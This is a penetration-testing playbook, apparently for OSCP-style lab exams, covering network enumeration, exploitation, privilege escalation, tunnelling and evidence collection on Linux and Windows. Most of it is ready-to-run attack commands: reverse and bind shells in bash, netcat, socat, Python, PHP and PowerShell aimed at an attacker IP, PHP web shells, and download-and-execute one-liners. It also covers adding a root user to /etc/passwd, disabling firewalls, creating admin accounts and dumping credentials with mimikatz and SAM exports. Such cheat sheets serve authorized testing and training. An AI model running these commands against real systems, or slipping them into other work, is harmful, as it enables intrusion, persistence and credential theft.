Penetration Test Playbook
Passive Information Gathering
Active Information Gathering
Network-wide Enumeration
What have we got from our network-wide enumeration (if applicable)?
cd network_enumeration
for file in $(ls .); do cat $file | grep '<new victim IP or hostname or user>'; done
Manually check for reverse lookups e.g. host <victim IP>
Other Boxes?
What have we got from breaking into other boxes on the network (if applicable)?
cd box_enumeration
for file in $(ls .); do cat $file | grep '<new victim IP or hostname or user>'; done
Automate it
sudo ~/Documents/tools/nmapAutomator/nmapAutomator.sh --type All --host <victim IP address>
cd 01_autorecon/scans/
for file in $(ls); do cat $file; done
python3 ~/Documents/tools/AutoRecon/src/autorecon/autorecon.py <victim IP address>
cd 01_nmapautomator/<nmap OR recon>/
for file in $(ls); do cat $file; done
Quick Nmap Scan
sudo nmap --top-ports 20 --open <victim IP>
Quick Nmap UDP Scan
sudo nmap -sU --top-ports 20 --open <victim IP>
Heavyish Nmap Scan
sudo nmap <victim IP> -p- -sT --reason
sudo nmap <victim IP> -p <ports you've found that are open> -sV --reason
sudo nmap -sS -sV -A -O -p <ports that you've found are open> <IP address>
sudo nmap -sS -sV -A -O -p- <IP address>
Other Nmap Scans
nmap -vv --reason -Pn -sV -sC --version-all -oN <victim IP>
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <victim IP>
Nmap NSE Scripts
Find some relelvant NSE scripts with
ls -al /usr/share/nmap/scripts/ | grep <service>
then scan with
sudo nmap <victim IP> --script=<script found above>
also check for script arguments to run things properly:
for script in $(ls /usr/share/nmap/scripts/ | grep <service>); do nmap --script-help $script; done
53 DNS
Set up your machine for the environment:
sudo nmap -sS -sV -A -p 53 10.11.1.0/24 -oG 01_dns_enum.txt
cat 01_dns_enum.txt | grep -i open | cut -d ' ' -f 2 > 01_dns_servers.txt
then edit /etc/resolv.conf
to use em e.g. add lines like the following: nameserver 10.11.1.20
Find DNS Servers
host -t mx google.com
host -t txt google.com
dnsenum google.com
dnsrecon -d google.com -t axfr
DNS Zone Transfer
host -l <domain name> <dns server address>
80, 8080 HTTP, 443 HTTPS, 8009 Apache Tomcat / Jserv
nmap -vv --reason -Pn -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" <victim IP>
If port 80 or 443 are open - visit it in a browser, curl -i <victim IP>
, curl -i -L <victim IP>
, view source
, inspect element
, elements supporting user interaction, cookies being set, URL manipulation, directory traversal
curl <victim IP address>/robots.txt -s | html2text
View robots.txt
as a Search Engine:
curl --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" http://<victim IP address>/robots.txt
See AutoRecon and NmapAutomator output.
SSL Enumeration:
sslscan <victim IP>
curl -v '<url>'
curl -v '<url>' --insecure
Web Application Scanning:
gobuster dir -u <IP address> -w <wordlist>
dirb http://<domain or IP address> <wordlist>
Are there any other wordlists we should look at trying based on gobuster
or dirb
results?
ls -al /usr/share/wordlists/SecLists/Discovery/Web_Content/
ls -al /usr/share/wordlists/dirb/
dirb http://10.11.1.71 /usr/share/wordlists/SecLists/Discovery/WebContent/CGIs.txt -N 302
gobuster dir -u <IP address> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt
Remember that
gobuster
doesn't recursively search,dirb
does by default, if you're not finding anything useful, kick off the slower boi
nikto -h <IP address>
wpscan --url <domain> --enumerate ap,at,cb,dbe
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <victim IP address>
22 SSH, 3389 RDP, 5900 VNC
ls -lh /usr/share/nmap/scripts/*<service>*
nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <victim IP address>
Sometimes need
-Pn
Attempt in connect to open ports using ssh
, rdesktop
, telnet
, nc
, ftp
, smbclient
, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md
, is there a robots.txt
?
rdesktop -u <username> <victim IP address>
139 NetBios SSN, 445 SMB
sudo nmap -sV -sS -p 139,445 --script=smb-os-discovery <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-enum* <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-vuln* <IP address>
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <victim IP>
sudo nbtscan <IP address>
sudo enum4linux -a <IP address>
smbmap -H <victim IP>
Not getting the version out of Nmap? Set up Wireshark to capture a connection to a guest session, then inspect the packet called Session Setup AndX Response
, you should get a field called Native LAN Manager
which has a version number in there.
Or, also if you aren't getting a version, in one terminal type this: sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
, and in a second window: smbmap -H 10.11.1.115 -u '' -p '' -P 139
, then go back to the first one to see what you're capturing, a version should pop.
Log in to a SMB Server:
smbclient //<victim IP address>/<share name>
smbclient -L <name of server>
Logging in using Guest account:
smbclient //<victim IP address>/<share folder> -U" "%" "
smbclient "//<victim IP address>/<share name> -U guest%
smbclient -L \\<victim IP address>
smbmap -H <victim IP address> -u '' -p '' -P 139
Attempt in connect to open ports using ssh
, rdesktop
, telnet
, nc
, ftp
, smbclient
, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md
, is there a robots.txt
?
Enumerate a DC: add a line to /etc/hosts
resolving the IP to the domain name, then run Nmap scans against the domain name.
Enumerate Usernames of DC: make sure your domain is resolved nicely in /etc/hosts
then run ./kerbrute userenum --dc thedomain.local -d thedomain.local <wordlist>
25 SMTP, 110 POP3, 995 POP3S, 143 IMAP, 993 IMAPS
sudo nmap <victim IP> -sV -p 25 --script smtp*
sudo nmap <victim IP> -sV -p 110 --script pop*
Attempt in connect to open ports using ssh
, rdesktop
, telnet
, nc
, ftp
, smbclient
, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md
, is there a robots.txt
?
Enumerate users by connecting via telnet <victim IP> 25
and running command VRFY <user>
or EXPN
, test for mail
, daemon
, root
, backup
, and other user names found through other enumeration techniques, or by using nc
with the -c
option to fix line endings
111 RPCBind, 135 MSRPC, 1025 MSRPC, 2049 NFS
sudo nmap -sV -p 111 --script=rpcinfo <IP address>
sudo nmap -sV -sS -p 111 --script nfs* <IP address>
sudo nmap -sV -p 135 --script=msrpc-enum <victim IP address>
rpcinfo -s <victim IP address>
Show mounting information for an NFS server: showmount -a <victim IP address>
Mount a NFS share on Kali: sudo mkdir /var/<share name>
, sudo mount -t nfs <victim IP address>/<share name> /var/<share name>
, to verify it mounted successfully use with mount
or df -h
Unmount a NFS share on Kali: use either of the following: umount <victim IP address>:<share name>
OR umount /var/<share name>
, if it doesn't detach because it's in use, use fuser -m MOUNT_POINT
to see which processes are using it, and if you still have trouble you can use the --lazy
option to unmount a busy file system as soon as it's not busy anymore: umount -l MOUNT_POINT
Attempt in connect to open ports using ssh
, rdesktop
, telnet
, nc
, ftp
, smbclient
, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md
, is there a robots.txt
?
21 FTP
sudo nmap -p 21 -sV --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum <victim IP address>
If anonymous log in is allowed: ftp <victim IP>
with user anonymous
and any password, and make sure to set transfer mode using binary
so any binary files getting uploaded don't get mangled.
Common Useful Commands
help
pwd
ls
get <filename>
put <filename>
1433 MS-SQL, 3306 MySQL
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <victim IP address>
Attempt in connect to open ports using ssh
, rdesktop
, telnet
, nc
, ftp
, smbclient
, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md
, is there a robots.txt
?
sqsh -S <victim IP address> -U sa -P <password>
, then go see MS SQL xp_cmdshell card for setting it up if not configured.
161 SNMP
sudo nmap -sU --open -p 161 <IP address>
onesixtyone -c community -i <IP address>
snmpwalk -c <public, private, manager> -v1 <IP address>
Attempt in connect to open ports using ssh
, rdesktop
, telnet
, nc
, ftp
, smbclient
, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md
, is there a robots.txt
?
Exploitation
Using Public Exploits
Finish your enumeration above, write-up version numbers, be thorough
searchsploit <term> --exclude="(PoC)|/dos/"
Google all the versions and any CVE's etc. that came up during enumeration.
Find any named vulnerabilities or services to search for Nmap scripts for to confirm your victim is vulnerable? Find any POCs out in the internet for those vulnerabilities to throw?
Are there any Nmap scripts for named vulns you've found? ls -lah /usr/share/nmap/scripts/*<vuln name e.g. shellshock>*
Check how recent the public exploits are, pick the most recent one, if there's old libraries see if you can port them to new ones.
Finding exploits - starting with services and applications running before moving on to operating system and kernel exploits - searchsploit <keywords> --exclude='/dos/'
, searchsploit -x <exploit code>
Prepare Virtual Environment for Exploitation:
python3 -m venv virtual-env-name
virtualenv -p /usr/bin/python2.7 virtual-env-name
Avoiding SSL and SelfSignedCerts in Python:
import requests
res = requests.get(url, allow_redirects=False, verify=False)
print(res.status_code)
Compile Linux 32-bit Binary on 64-bit Kali:
gcc -m32 exploit.c -o exploit
Compile Linux 64-bit Binary on 64-bit Kali:
gcc exploit.c -o exploit
gcc -Wl,--hash-style=both -m32 -Wall -o exploit exploit.c
Compile Windows 32-bit Binary on 64-bit Kali:
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
i686-w64-mingw32-gcc exploit.c -o exploit.exe
Compile Windows 64-bit Binary on 64-bit Kali:
i686-w64-mingw32-gcc exploit.c -o exploit.exe
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
Web Application Attacks
Did you find any admin consoles? admin:<blank>
, admin:admin
, admin:password
, root:<blank>
, root:root
, root:password
, username:username
, admin:adminadmin
, any users/passwords from other boxes that might have been reused?
Generate a lil wordlist based on a login page you've got to: cewl http://<url of login page> -w wordlist.txt
Is the application open source and hosted in some repository? Can we find default credentials / locations sensitive information is stored / identifiers for sensitive information we could grep
around for?
XSS: < > ' " { } ;
Directory Traversal: ../
, ..\
File Inclusion: http://domain/page.php?file=<do some things>
SQL Injection: '
, or 1=1;#
, or 1=1 LIMIT 1;#
Reviewing and manipulating network traffic with BurpSuite
, tcpdump
, and Wireshark
Client-Side Attacks
Passive Information Gathering: Google, Shodan, social media, forums to find information about externally facing infrastructure, operating systems of, browser types, versions, installed plugins, User-Agent strings.
Active Information Gathering: social engineering, client fingerprinting.
Leveraging HTML Applications (.hta
)
Exploiting Microsoft Office.
General Shells
ls -al /usr/share/webshells/
Test payloads:
whoami
echo $USER && cat /etc/issue
phpinfo()
Powercat Reverse:
powercat -c <attacker IP> -p 443 -e cmd.exe, catch with sudo nc -lvp 443
Powercat Bind:
powercat -l -p 443 cmd.exe, connect to with nc <victim IP> 443
Powercat - generate encoded reverse shell, then send to attacker machine from victim:
powercat -c <attacker IP> -p 443 -e cmd.exe -ge > encoded_reverseshell.ps1
powershell.exe -E <Base64 encoded string stored in encoded_reverseshell.ps1>
General Shell Non-staged:
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe
General Shell Staged:
msfvenom -p windows/shell/reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe
Apache Tomcat / Java Application:
msfvenom -p java/shell_reverse_tcp LHOST=<attacker machine> LPORT=4444 -f war -o shell.war
PHP:
<?php passthru($_GET['cmd']);?>
<?php $sock=fsockopen("<controller IP address>",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>
Get Shells with PHP:
<?php system("wget <attacker IP address>/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>
Python Reverse:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker machine>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Linux Shells
Bash Reverse:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <listener IP> <listener port> >/tmp/f
/bin/bash -i >& /dev/tcp/<listener IP>/443 0>&1
Netcat Reverse (Linux Victim):
# the shell
nc -nv <attacker IP> 1234 -e /bin/bash
# catch with
sudo nc -nvlp 1234
Netcat Bind (Linux Victim):
# the shell
nc -nvlp 4444 -e /bin/bash
# connect to with
nc -nv <victim IP> 4444
Socat Bind (Linux Victim):
# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
# connect to with
socat - TCP4:<remote IP address>:4443
Socat Reverse (Linux Victim):
# the shell
socat TCP4:<remote IP address>:443 EXEC:/bin/bash
# catch it with
socat -d -d TCP4-LISTEN:443 STDOUT
Get a more stable TTY with Socat: listen with first command, then send shell with:
socat file:<backtick>tty<backtick>,echo=0,raw tcp-listen:4444
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker IP address>:4444
Windows Shells
Running executables from Windows command prompt:
C:\Windows\System32\cmd.exe /c <enter executable / command here>
start <enter command / executable here>
Netcat Reverse (Windows Victim):
# the shell
ncat -nv <attacker IP> 4444 -e /mnt/c/Windows/system32/cmd.exe
# catch with
sudo nc -nvlp 4444
Netcat Bind (Windows Victim):
# the shell
ncat -nvlp 4444 -e /mnt/c/Windows/system32/cmd.exe
# connect to with
nc -nv <victim IP> 4444
Socat Reverse (Windows Victim):
# the shell
socat TCP4:<remote IP address>:4443 EXEC:'cmd.exe',pipes
# catch it with
socat -d -d TCP4-LISTEN:443 STDOUT
Socat Bind (Windows Victim):
# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
# connect to with
socat - TCP4:<remote IP address>:4443
PowerShell Reverse:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker machine>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..66535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();};$client.Close()"
PowerShell Bind:
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' +(pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
PowerShell Using nishang:
powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker IP> -Port 1337
Post-Exploitation
Transferring Files
Transferring files with socat
:
# serve it up with
sudo socat TCP4-LISTEN:443,fork file:some_file.txt
# download it with
socat TCP:<remote IP address>:443 file:some_file.txt,create
Transferring files by serving em up on HTTP:
python2 -m SimpleHTTPServer 8888
python3 -m http.server 7331
then use wget
, curl --output
, visit in a browser on your victim, or put your resource at /var/www/html
run sudo systemctl start apache2
then use wget
on your victim.
Transferring files with nc
to Linux host:
# on attacker machine
sudo nc -q 5 -nvlp 80 < <some script>.sh
# then on victim
/dev/tcp/<attacker machine>/80 | sh
Transferring files with nc
to Linux host:
# on attacker machine
sudo nc -q 5 -nvlp 80 < <some script>.sh
# then on victim
/dev/tcp/<attacker machine>/80 | sh
Execute from memory and send output back to the attacker:
nc -nvlp 9002 | tee output.out
# then on victim
curl <attacker machine>/<script to execute>.sh | sh | nc <attacker machine> 9002
Transferring files with SMB (note you have to serve these up as root
on your machine, and use a Python virtual environment because you're gonna need Python 2 and the ImPacket library):
# on attacking machine:
smbserver.py a /usr/share/windows-binaries/
# on victim machine:
\\<attacker IP>\a\whoami.exe
Transferring files with ftp
: ftp <victim IP>
, binary
to set binary mode if you're transferring executables, just in case it's in ASCII mode and wrecks the file, put <file name on attacker machine>
, also use to transfer files from victim to attacker machine, if FTP is around, using ftp <attacker IP>
, and the user:password
of offsec:offsec
Transferring Files with certutil
:
certutil.exe -urlcache -split -f http://<attacker machine>/<file to transfer>
Checking file integrity after upload:
powershell get-filehash -Algorithm MD5 <file name> or md5sum <file name>
Download file to disk with PowerShell:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<attacker IP address>/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
Run file in memory with PowerShell:
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker IP address>/helloworld.ps1')
General Privilege Escalation
Non-interactive to Interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
Enumeration and Finding Exploits - starting with services and applications running before moving on to operating system and kernel exploits:
searchsploit <keywords> --exclude='/dos/'
searchsploit -x <exploit code>
Own /bin/bash
: chmod +s /bin/bash
/bin/bash -p
UDF in MySQL: select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash');
then from local shell run /tmp/rootbash -p
Enumerating Linux for Privilege Escalation
Is your shell interactive - su
, what kind of shell is it - echo $SHELL
, do you need to fix your PATH? Fix PATH
if you need to:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/bin:/sbin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:
whereis perl
whereis python
whereis nc
whereis nmap
Utilise Nmap: sudo nmap --interactive
, !sh
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/tmp/rootbash -p
Automating Enumeration and Privilege Escalation: LinEnum
, Linux Smart Enumeration lse.sh
, unix-privesc-check
View real, effective, and saved user and group IDs:
id
cat /proc/$$/status | grep "[UG]id"
More info about the box:
hostname
cat /etc/issue
cat /etc/*-release
uname -a
uname -i
ip a
ifconfig
lsb_release -a
Running Processes:
ps axu
ps aux | grep "^root"
<program> --version
<program> -v
dpkg -l | grep <program>
rpm -qa | grep <program>
Can we use sudo
?
sudo <program>
sudo -u <username> <program>
sudo -l
sudo -s
sudo -i
sudo /bin/bash
sudo passwd
Anything useful in GTFOBins? Any config files hanging around with passwords in em? Any SSH keys hanging around?
Current user information:
whoami
echo %username%
id
who
pwd
last
cat ~/<.bash_profile
.bashrc
.bash_logout>
cat /etc/<profile
bashrc>
env
set
cat ~/.*history | less
Is /etc/shadow
readable?
head -n 1 /etc/shadow
echo '<hash from above command>' > hash.txt
john --format=sha512crypt --wordlist=rockyou.txt hash.txt
Is /etc/shadow
modifiable?
cat /etc/shadow > etc_shadow_backup.txt
mkpasswd -m sha-512 newpassword
vim /etc/shadow
Is /etc/passwd
modifiable? Make a new root
user if you find you can write to /etc/passwd
:
# generate password with
openssl passwd evil
# then
echo "root2:<generated openssl hash>:0:0:root:/bin/bash" >> /etc/passwd"
# then log in with
su root2
Looking for readable backup files:
ls -al /
ls -al /home/user
ls -al /tmp
ls -al /var/backups
Found a readable private SSH key? Download root_key
to local machine then:
chmod 600 root_key
ssh -i root_key root@<victim machine>
Find SUID Binaries:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
# find SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Find all writeable files in /etc
:
find /etc -maxdepth 1 -writable -type f 2> /dev/null
Find all readable files in /etc
:
find /etc -maxdepth 1 -readable -type f 2> /dev/null
Find Writeable Files:
find / -writable ! -user <whoami> -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
Find all directories which can be written to: find / -executable -writable -type d 2> /dev/null
Files Edited in Last 10 Minutes:
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
Who else uses the box:
cat /etc/passwd
cat /etc/sudoers
sudo -l grep -vE "nologin|false" /etc/passwd
grep -v '^#' /etc/ssh/sshd_config | uniq
Connectivity info, compare to port scan to see what's allowed through the firewall:
/sbin/route
netstat -atulpn
ss -anp
/etc/iptables
arp -e
chkconfig --list
grep 80 /etc/services
Environment variables - is LD_PRELOAD
or LD_LIBRARY_PATH
available in the PATH? Can we mess with what's in the PATH using cron jobs?
Finding programs that try to execute other programs:
strings /path/to/file
strace -v -f -e execve <command> 2>&1 | grep exec
ltrace <commad>
Investigate scheduled jobs:
crontab -l
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
cat /etc/services
for dir in $( ls /etc/ | grep cron); do ls -al /etc/$dir; done
NFS:
# on target
cat /etc/exports
showmount-e 192.168.1.25
# locally on kali as root
mkdir/tmp/nfs
mount -o rw,vers=2 192.168.1.25:/tmp/tmp/nfs
msfvenom-p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod+xs/tmp/nfs/shell.elf
# and finally on target
/tmp/shell.elf
What's installed:
dpkg -l
rpm -qa
lsmod
/sbin/modinfo <module>
ls -alh /usr/bin/
ls -alh /sbin/
Investigate services:
cat /etc/fstab | grep <service name>
service --status-all
ls /etc/init.d
What's in the web root?
Debian - /etc/apache2/
CentOS - /etc/httpd/
Find document root when just config is stored at the web root - grep -Ri DocumentRoot
, often at /var/www/html/
Are any services misconfigured/have vulnerable plugins - cat /etc/*.conf
, where can we write things - find / -writeable -type d 2>/dev/null
Passwords in memory: strings /dev/mem -n10 | grep -i PASS
Enumerating Windows for Privilege Escalation
Is your shell interactive, what kind of shell is it, do you need to fix your PATH, what tools are installed and available to you?
Automating Enumeration and Privilege Escalation: LovelyPotato
, windows-privesc-check
, JAWS
, windows-exploit-suggester
, Sherlock.ps1
, Watson,
Windows Exploit Suggestor Script
type
dir
del
net user test 1234 /add
net localgroup administrators test /add
cacls *.* /t /e /g domainname\administrator:f
netsh firewall set opmode disable
where perl
where python
where ncat
powershell $PSVersionTable
Current user information:
whoami
whoami /priv
whoami /groups
net user
net user <username>
net user <username> /domain
net accounts
More info about the box:
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
mountvol
wmic qfe get Caption, Description, HotFixID, InstalledOn
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
net share
Connectivity info - make sure to compare this to what you already know, are there more ports here that you couldn't see with your earlier scans:
ipconfig /all
route print
netstat -ano
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
Default Writeable Folders:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
Where is the web root? Windows ISS - C:\inetpub\wwwroot\
Finding Unquoted Paths:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Processes running - tasklist /SVC
Regular jobs running:
schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
Check for Exploitable Services - using old version of accesschk.exe
to circumvent to GUI prompt when running it:
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -ucqv <service name identified from first command>
What's installed:
wmic product get name, version, vendor, driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path, Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
driverquery.exe /fo table
Where can we write things:
accesschk.exe -uws "Everyone" "C:\Program Files", powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{_.AccessToString -match "Everyone\sAllow\s\sModify"}
Enumerating Active Directory: net user
and PowerShell
Enable RDP:
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Has Windows Auto-login Password been set? reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Active Directory Authentication Attacks: mimikatz.exe privilege::debug token::elevate sekurlsa::logonpasswords sekurlsa::tickets kerberos::list /export
, klist
, Invoke-Kerberoast.ps1
, GetUserSPNs.ps1
, Spray-Passwords.ps1
, Pass the Hash, Overpass the Hash, Pass the Ticket, Generating Golden Tickets, Domain Controller Synchronisation
Port Forwarding and Tunneling
General Port Forwarding (Linux):
internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - in /etc/rinetd.conf
:
<internet-connected victim> 80 <non-internet-connected victim> 80
sudo service rinetd restart
ss -antp | grep "80"
so all traffic sent on port 80 to the internet-connected victim will be sent to the non-internet-connected victim.
General Remote Port Forwarding (Windows):
internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - from our reverse shell, so running on the internet-connected victim to access a port not available through the firewall:
cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R <attacker>:1234:<internet-connected victim>:3306 <attacker>
we can now scan a port that was previously unviable to us:
sudo nmap -sT -sV 127.0.0.1 -p 1234
General Local Port Forwarding (Windows):
internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - on the internet-connected victim:
plink.exe -N -L <internet-connected victim machine>:4444:<attacker machine>:443 kali@<attacker machine>
on the attacker machine: Make sure you PermitRootLogin (value yes
in /etc/ssh/sshd_config
) in your attacker machine first, and restart the SSH service sudo service ssh restart
, then connect on your attacker machine to 127.0.0.1:443
SSH Local Port Forwarding:
sudo ssh -N -L <attacker IP>:445:<non-internet-connected victim IP>:445 <victim user>@<internet-connected victim>
if you're doing SMB make sure /etc/samba/smb.conf
on your attacker machine has min protocol = SMB2
in it.
If for some reason, an exploit cannot run locally on the target machine, the port can be forwarded using SSH to your local machine:
ssh -R <local port>:127.0.0.1:<target port> <username>@<local machine>
SSH Remote Port Forwarding:
internet-connected victim facilitating attacker machine connecting to port on internet-connected victim that isn't allowed through the firewall - run on internet-connected Linux victim:
ssh -N -R <attacker machine>:2221:127.0.0.1:3306 <attacker user>@<attacker machine>,
now we can scan the originally unavailable port:
sudo nmap -sS -sV 127.0.0.1 -p -2221
SSH + SOCKS4 Dynamic Port Fowarding:
internet-connected victim facilitating attacker machine connecting to non-internet-connected victims - run on attacker machine:
sudo ssh -N -D 127.0.0.1:8080 <victim user>@<internet-connected victim>
configure SOCKS4 proxy in /etc/proxychains.conf
: socks4 127.0.0.1 8080
, and now run tools through it:
sudo proxychains nmap --top-ports=20 -sT -Pn <non-internet-connected victim>
Netsh Port Forwarding (Old Windows):
set up internet-connected victim to faciliate connection to a non-internet-connected victim
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=<internet-connected victim> connectport=445 connectaddress=<non-internet-connected victim>
allow this kind of traffic to traverse internal firewall:
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<internet-connected victim> localport=4455 action=allow
connect to non-internet-connected victim from attacker by connecting to relevant port on internet-connected victim:
smbclient -L <internet-connected victim> --port=4455 --user=Administrator
Collect Evidence
Linux
cat proof.txt
cat local.txt
ipconfig
ip a
cat local.txt
Home Directories: ls -lahR /home/
Connections to other machines / internal networks:
netstat -antulp
/sbin/route/
ufw status numbered
Search for File Names:
find / -type f -name '*cred*'
find / -type f -name '*password*'
find / -type f -name '*key*'
find / -type f -name "*ssh*"
Secrets about other machines / internal networks: find / -type f -name '*secret*'
Search for File Contents: grep -Ri password
- don't do this at /
Find thing owned by a specific user or group:
find / -group <group name>
find / -user <user name>
Any databases running here we want to get info out of?
dpkg -l | grep database
mysql -u<db user> -p<db user password> -e 'show databases;'
Investigate scheduled jobs for more interesting info: for dir in $( ls /etc/ | grep cron); do ls -al /etc/$dir; done
/etc/passwd
/etc/shadow
Password Attacks: crackstation
hashid <hash>
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Windows
type proof.txt
type local.txt
ipconfig
type network-secret.txt
type local.txt
Get Searchable Lists of all the Folders and Files:
tree c:\ > folders.txt
dir /s c:\ > files.txt
Search for File Names:
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
gci -recurse -filter "proof.txt" -File
gci -recurse -filter "*proof*" -File
Search for File Contents:
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Connections to other machines / internal networks: netstat -ano
Home Directories: C:\Users\
Kerberos: krbtgt
, klist
Password Attacks: crackstation
hashid <hash>
mimikatz.exe privilege::debug token::elevate
sekurlsa::logonpasswords, lsadump::sam, sekurlsa::tickets
kerberos::list
pth-winexe -U <victim user>%<LM hash>:<NTLM hash> //<victim IP> cmd
sudo john hash.txt --format=NT
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
Older Operating System Password Attacks:
pwdump
fgdump
wce
# on the victim machine
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System
reg save HKLM\Security c:\Security
